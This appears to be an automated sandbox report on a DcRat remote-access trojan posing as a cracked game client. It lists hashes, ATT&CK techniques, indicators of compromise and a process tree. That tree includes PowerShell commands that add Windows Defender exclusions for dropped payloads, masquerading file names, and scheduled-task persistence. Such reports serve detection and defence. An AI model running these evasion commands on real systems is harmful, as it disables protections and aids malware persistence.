dcrat | 09bdb3282e1927dcb848126823280b066827c5dadd17ee6d445922440889d8f2

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13/01/2025, 12:15 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NursultanAlphaCrack.bat.exe
Size

2.7MB
MD5

df15d1f8f7cc71bb1889895b367c7d2c
SHA1

4a9d087d105976a1f7a1c7444a25b5e0a8ac0622
SHA256

09bdb3282e1927dcb848126823280b066827c5dadd17ee6d445922440889d8f2
SHA512

3c5215abd2ca1cee15ae3592eea15cebec2ce0127221c96634ad07ea53cf9fa397bfecd229a56b38c879f2fe6dadfc8bd58ac6541bcfc6eba65017d4b3694e4f
SSDEEP

49152:IBJVZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rnh:y7oYp9kiHPbCfX4rsu3GQh

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3776	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3288	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2064	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4160	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1052	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5028	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4964	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3464	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1524	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	748	4320	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1136	4320	schtasks.exe	88

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4580	powershell.exe
4792	powershell.exe
1668	powershell.exe
2980	powershell.exe
4204	powershell.exe
2328	powershell.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	BlockcontainerWin.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	NursultanAlphaCrack.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spoolsv.exe

Executes dropped EXE 14 IoCs

pid	Process
2176	BlockcontainerWin.exe
3092	spoolsv.exe
3984	spoolsv.exe
3272	spoolsv.exe
3788	spoolsv.exe
5056	spoolsv.exe
1256	spoolsv.exe
5092	spoolsv.exe
456	spoolsv.exe
1744	spoolsv.exe
3396	spoolsv.exe
2348	spoolsv.exe
1668	spoolsv.exe
2788	spoolsv.exe

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Sidebar\csrss.exe	BlockcontainerWin.exe
File created	C:\Program Files (x86)\Windows Sidebar\886983d96e3d3e	BlockcontainerWin.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\smss.exe	BlockcontainerWin.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\69ddcba757bf72	BlockcontainerWin.exe
File created	C:\Program Files\Windows Security\spoolsv.exe	BlockcontainerWin.exe
File created	C:\Program Files\Windows Security\f3b6ecef712a24	BlockcontainerWin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NursultanAlphaCrack.bat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4012	PING.EXE
1352	PING.EXE
2004	PING.EXE
2176	PING.EXE
4880	PING.EXE
1964	PING.EXE
2924	PING.EXE
2788	PING.EXE
2408	PING.EXE
1772	PING.EXE

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	NursultanAlphaCrack.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	BlockcontainerWin.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	spoolsv.exe

Runs ping.exe 1 TTPs 10 IoCs

Remote System Discovery

T1018

pid	Process
2924	PING.EXE
2176	PING.EXE
1964	PING.EXE
2408	PING.EXE
1772	PING.EXE
4012	PING.EXE
1352	PING.EXE
2004	PING.EXE
4880	PING.EXE
2788	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3776	schtasks.exe
4872	schtasks.exe
1524	schtasks.exe
748	schtasks.exe
2660	schtasks.exe
3164	schtasks.exe
2700	schtasks.exe
2064	schtasks.exe
4836	schtasks.exe
5028	schtasks.exe
3288	schtasks.exe
4160	schtasks.exe
1052	schtasks.exe
1768	schtasks.exe
4816	schtasks.exe
4964	schtasks.exe
3464	schtasks.exe
1136	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe
2176	BlockcontainerWin.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2176	BlockcontainerWin.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	3092	spoolsv.exe
Token: SeDebugPrivilege	3984	spoolsv.exe
Token: SeDebugPrivilege	3272	spoolsv.exe
Token: SeDebugPrivilege	3788	spoolsv.exe
Token: SeDebugPrivilege	5056	spoolsv.exe
Token: SeDebugPrivilege	1256	spoolsv.exe
Token: SeDebugPrivilege	5092	spoolsv.exe
Token: SeDebugPrivilege	456	spoolsv.exe
Token: SeDebugPrivilege	1744	spoolsv.exe
Token: SeDebugPrivilege	3396	spoolsv.exe
Token: SeDebugPrivilege	2348	spoolsv.exe
Token: SeDebugPrivilege	1668	spoolsv.exe
Token: SeDebugPrivilege	2788	spoolsv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3556 wrote to memory of 4656	3556	NursultanAlphaCrack.bat.exe	83
PID 3556 wrote to memory of 4656	3556	NursultanAlphaCrack.bat.exe	83
PID 3556 wrote to memory of 4656	3556	NursultanAlphaCrack.bat.exe	83
PID 4656 wrote to memory of 4468	4656	WScript.exe	85
PID 4656 wrote to memory of 4468	4656	WScript.exe	85
PID 4656 wrote to memory of 4468	4656	WScript.exe	85
PID 4468 wrote to memory of 2176	4468	cmd.exe	87
PID 4468 wrote to memory of 2176	4468	cmd.exe	87
PID 2176 wrote to memory of 4580	2176	BlockcontainerWin.exe	108
PID 2176 wrote to memory of 4580	2176	BlockcontainerWin.exe	108
PID 2176 wrote to memory of 1668	2176	BlockcontainerWin.exe	109
PID 2176 wrote to memory of 1668	2176	BlockcontainerWin.exe	109
PID 2176 wrote to memory of 4792	2176	BlockcontainerWin.exe	110
PID 2176 wrote to memory of 4792	2176	BlockcontainerWin.exe	110
PID 2176 wrote to memory of 2980	2176	BlockcontainerWin.exe	111
PID 2176 wrote to memory of 2980	2176	BlockcontainerWin.exe	111
PID 2176 wrote to memory of 4204	2176	BlockcontainerWin.exe	112
PID 2176 wrote to memory of 4204	2176	BlockcontainerWin.exe	112
PID 2176 wrote to memory of 2328	2176	BlockcontainerWin.exe	113
PID 2176 wrote to memory of 2328	2176	BlockcontainerWin.exe	113
PID 2176 wrote to memory of 2688	2176	BlockcontainerWin.exe	119
PID 2176 wrote to memory of 2688	2176	BlockcontainerWin.exe	119
PID 2688 wrote to memory of 812	2688	cmd.exe	122
PID 2688 wrote to memory of 812	2688	cmd.exe	122
PID 2688 wrote to memory of 2924	2688	cmd.exe	123
PID 2688 wrote to memory of 2924	2688	cmd.exe	123
PID 2688 wrote to memory of 3092	2688	cmd.exe	131
PID 2688 wrote to memory of 3092	2688	cmd.exe	131
PID 3092 wrote to memory of 4120	3092	spoolsv.exe	133
PID 3092 wrote to memory of 4120	3092	spoolsv.exe	133
PID 4120 wrote to memory of 3192	4120	cmd.exe	136
PID 4120 wrote to memory of 3192	4120	cmd.exe	136
PID 4120 wrote to memory of 4012	4120	cmd.exe	137
PID 4120 wrote to memory of 4012	4120	cmd.exe	137
PID 4120 wrote to memory of 3984	4120	cmd.exe	146
PID 4120 wrote to memory of 3984	4120	cmd.exe	146
PID 3984 wrote to memory of 116	3984	spoolsv.exe	148
PID 3984 wrote to memory of 116	3984	spoolsv.exe	148
PID 116 wrote to memory of 4080	116	cmd.exe	150
PID 116 wrote to memory of 4080	116	cmd.exe	150
PID 116 wrote to memory of 1352	116	cmd.exe	151
PID 116 wrote to memory of 1352	116	cmd.exe	151
PID 116 wrote to memory of 3272	116	cmd.exe	154
PID 116 wrote to memory of 3272	116	cmd.exe	154
PID 3272 wrote to memory of 4672	3272	spoolsv.exe	157
PID 3272 wrote to memory of 4672	3272	spoolsv.exe	157
PID 4672 wrote to memory of 2924	4672	cmd.exe	159
PID 4672 wrote to memory of 2924	4672	cmd.exe	159
PID 4672 wrote to memory of 2004	4672	cmd.exe	160
PID 4672 wrote to memory of 2004	4672	cmd.exe	160
PID 4672 wrote to memory of 3788	4672	cmd.exe	162
PID 4672 wrote to memory of 3788	4672	cmd.exe	162
PID 3788 wrote to memory of 3092	3788	spoolsv.exe	164
PID 3788 wrote to memory of 3092	3788	spoolsv.exe	164
PID 3092 wrote to memory of 760	3092	cmd.exe	166
PID 3092 wrote to memory of 760	3092	cmd.exe	166
PID 3092 wrote to memory of 2176	3092	cmd.exe	167
PID 3092 wrote to memory of 2176	3092	cmd.exe	167
PID 3092 wrote to memory of 5056	3092	cmd.exe	170
PID 3092 wrote to memory of 5056	3092	cmd.exe	170
PID 5056 wrote to memory of 4940	5056	spoolsv.exe	173
PID 5056 wrote to memory of 4940	5056	spoolsv.exe	173
PID 4940 wrote to memory of 2264	4940	cmd.exe	175
PID 4940 wrote to memory of 2264	4940	cmd.exe	175

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrack.bat.exe
"C:\Users\Admin\AppData\Local\Temp\NursultanAlphaCrack.bat.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3556
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4468
  - - C:\portsurrogateFontCrt\BlockcontainerWin.exe
      "C:\portsurrogateFontCrt/BlockcontainerWin.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\spoolsv.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Music\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Desktop\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mr8meW3tpm.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2688
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:812
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2924
      - C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nSTk4tfYD6.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4120
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3192
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4012
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:116
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4080
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1352
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat"
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:4672
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:2924
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2004
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3788
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3IMqqsTTOd.bat"
        13⤵
        Suspicious use of WriteProcessMemory
        
        PID:3092
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:760
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2176
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5056
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2juDPxCKYX.bat"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:4940
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2264
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:1436
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ogJsYefPP1.bat"
        17⤵
        
        PID:3536
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:516
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4880
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aehWhM7TGU.bat"
        19⤵
        
        PID:4672
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4968
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:5072
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat"
        21⤵
        
        PID:968
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:3192
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2788
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\o1vNVowh3C.bat"
        23⤵
        
        PID:2500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:3624
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1964
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3396
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q5hzjQRwNJ.bat"
        25⤵
        
        PID:1444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:3316
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2408
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZPsODb7c4Z.bat"
        27⤵
        
        PID:4276
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:836
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        28⤵
        
        PID:3116
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat"
        29⤵
        
        PID:1904
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:4376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1772
        
        C:\Program Files\Windows Security\spoolsv.exe
        
        "C:\Program Files\Windows Security\spoolsv.exe"
        30⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2788

C:\Windows\system32\schtasks.exe
